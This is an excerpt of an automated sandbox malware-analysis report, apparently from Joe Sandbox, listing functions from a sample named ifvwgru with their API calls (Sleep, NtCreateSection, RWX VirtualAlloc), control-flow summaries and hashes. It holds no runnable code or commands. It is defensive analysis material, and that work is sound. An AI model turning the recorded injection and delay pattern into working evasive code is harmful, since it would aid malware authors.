      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
      Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 503 40195c-4019ae call 4011cd Sleep call 401452 515 4019b0-4019b8 call 401553 503->515 516 4019bd-401a03 call 4011cd 503->516 515->516
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
      • Opcode Fuzzy Hash: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
      Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 530 401973-4019ae call 4011cd Sleep call 401452 541 4019b0-4019b8 call 401553 530->541 542 4019bd-401a03 call 4011cd 530->542 541->542
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
      • Opcode Fuzzy Hash: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
      Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
      • Opcode Fuzzy Hash: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
      Function 02EC9F30 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EC9F81
      Memory Dump Source
      • Source File: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EC3000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2ec3000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: df9fecf0ee99189606f59bc8d75ae11066e988aafdeb09114558cc656b72c058
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: D3112B79A40208EFDB01DF98CA85E98BBF5AF08351F1580A4F9489B362D371EA50DF90
      Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
      • Opcode Fuzzy Hash: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
      Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
      Download Yara Rule
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
      • Opcode Fuzzy Hash: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B